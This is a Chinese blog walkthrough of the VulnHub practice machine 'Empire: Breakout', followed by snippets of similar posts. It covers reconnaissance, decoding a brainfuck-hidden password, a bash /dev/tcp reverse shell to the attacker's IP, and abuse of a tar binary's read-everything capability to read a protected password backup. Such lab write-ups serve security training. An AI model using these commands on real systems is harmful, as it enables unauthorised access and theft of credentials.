【vulnhub】EMPIRE: BREAKOUT

置顶 已于 2023-03-19 15:50:10 修改
阅读量93 收藏
点赞数
分类专栏: vulnhub 文章标签: 服务器 网络 linux
于 2023-03-19 15:48:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42667028/article/details/129651673
版权

靶场链接:https://www.vulnhub.com/entry/empire-breakout,751/

  • Name: Empire: Breakout

  • Date release: 21 Oct 2021

扫描ip地址和mac地址

arp-scan -l

kali主机ip:192.168.241.129

靶机主机ip:192.168.241.130

nmap扫描靶机端口

nmap -T4 -sV -p- -A 192.168.241.130

获得信息:

以开启80,10000,20000网页端口

139和445是安装了samba服务的端口

80端口是默认网页,检查源代码发现有点像brainfuck编译器,

brainfuck:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

编译后:.2uqPEfj3D<P'a-3

10000端口和20000端口分别是两个登录页面

尝试admin,root与上述的密码都无法登录,再看看系统有没有其他信息

发现还有samba服务,尝试用enum4linux查看信息

enum4linux 192.168.241.130

发现用户名:cyber,尝试用户名和密码登录,直接成功。

页面的功能查看一遍,发现有一个按钮弹出cmd shell

尝试反弹shell

bash -i &>dev/tcp/192.168.241.129/111 <&1
nc -nlvp 111

成功反弹shell,接下来看看有没有其他信息

发现当前目录有两个文件,tar和user.txt

tar是打包文件,但是放在这个目录下,猜测有作用,getcap查看权限

发现cap_dac_read_search=ep,官方解释是:忽略所有对读、搜索操作的限制

查看大佬的wp,发现是一个var/backups/.old_pass.bak,但这个文件无权限执行,想起来使用tar文件先打包这个文件,然后再解压就可以查看了

打包:./tar -cvf oldpass.tar /var/backups

解压:./tar -xvf oldpass.tar -C ./oldpass

成功获得密码:Ts&4&YurgtRX(=~h

[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4499
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
EMPIRE:BREAKOUT渗透测试
weixin_69783474的博客
02-09 622
7、在刚才的解码中我们找到了一个密码,又在刚才找到了一个用户名,而10000和20000又都是登陆界面,所以我们可以尝试登录一下。80端口是一个apache页面,我们看一下有没有什么信息,发现并没有什么信息,可以再看一下网页的源代码。Cd 进去又说没有这样的文件,而tar本身有很多权限,所以说明可读有其他文件,通过其他文件可以看tar。可以知道它具有读取⽂件的⼀个功能。有一个这样的文件,发现没有可执行的权限,但是刚才的tar有可执行的权限。(其中的ip地址是kali的ip地址,6666是刚才设置的端口)
vulnhub靶机:Empire: Breakout
weixin_69670995的博客
05-13 927
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3873
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub 靶场 EMPIRE: BREAKOUT
weixin_61951055的博客
11-20 826
Vulnhub 靶场 EMPIRE: BREAKOUT
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 1144
Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
Vulnhub项目:EMPIRE: BREAKOUT
Ays.Ie的博客
12-07 282
Vulnhub项目:EMPIRE: BREAKOUT
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 1014
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empirebreakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 1076
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
vulnhub EMPIRE: BREAKOUT靶机
小小猪的博客
08-30 787
/tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)开启了smb服务,enum4linux 192.168.226.129收集更多信息,web指纹页面收集也可以,收集到用户名。直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak。再次查看,即可查看到root密码。...
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 869
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
vulnhubEmpire: Breakout
Ra1n3的博客
11-29 2671
vulnhub打靶记录
Vulnhub Empire Breakout
weixin_45682839的博客
08-05 712
VulnHub Empire系列靶场的第二个靶场Breakout学习记录攻略,设计的技术知识:brainfuck加解密、Enum4linux工具的使用、Linux提权
VulnhubEmpire: LupinOne
weixin_64112307的博客
05-08 2396
前期准备: 靶机地址: https://www.vulnhub.com/entry/empire-lupinone,750/ kali机IP:192.168.132.129 靶机IP:192.168.132.128 运行环境:VMware 一、信息收集: 使用nmap进行对靶机进行扫描 nmap -sC -sV 192.168.132.128 -p- -n -vv -min-rate=2000 发现了22与80端口,在80端口下发现robots.txt和~myfiles 利用80端.
排查服务器内存空间预警思路
最新发布
weixin_46228563的博客
05-12 169
这是导致根分区空间不足的根本原因。MySQL 数据文件过大需要针对性处理。如果存在 /var/lib/mysql,可能是数据库文件过大。从您的排查结果可以明确看出,/var/lib/mysql。
python标准库--itertools - 迭代器工具在算法比赛的应用
2402_84466011的博客
05-12 567
格雷码(Gray Code)是一种二进制编码方式,其特点是相邻的两个码字之间只有一位不同。格雷码是二进制数字系统,相邻两个数值仅有一位不同。生成前缀和数组,将子数组和查询优化到。直接生成格雷码,其中。右移一位的异或结果。
AI服务器通常会运用在哪些场景当中?
wanhengidc的博客
05-09 761
人工智能行业作为现代科技的杰出代表,在多个领域当中发展其强大的应用能力和价值,随之,AI服务器也在各个行业中日益显现出来,为各个行业提供了强大的计算能力和处理能力,帮助企业处理复杂的大规模数据,本文将来探索一下AI服务器通常都会运用在哪些场景当中吧!同时还可以预测金融市场的整体趋势和风险管理,在大规模数据分析方面起着非常重要的作用。AI服务器可以运用在医疗教育当中,用于医学图像分析和基因组学研究等场景中,能够帮助其加速医学研究的速度,并且可以提高医学诊断的准确性,对国家医学领域发展做出一定的贡献。
使用 systemd 管理 Linux 服务:配置与自动重启指南
qq128252的博客
05-09 446
systemd 是现代 Linux 系统中常用的服务管理器,能够可靠地管理进程并在进程崩溃时自动重启。要创建 systemd 服务文件,需在 /etc/systemd/system/ 目录下创建一个 .service 文件,定义服务的描述、依赖关系、运行用户、工作目录、启动命令、重启策略及日志输出路径等。文件内容应避免包含注释,否则可能导致错误。创建文件后,使用 systemctl daemon-reload 重新加载配置,并通过 systemctl enable 和 systemctl start 启用和
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值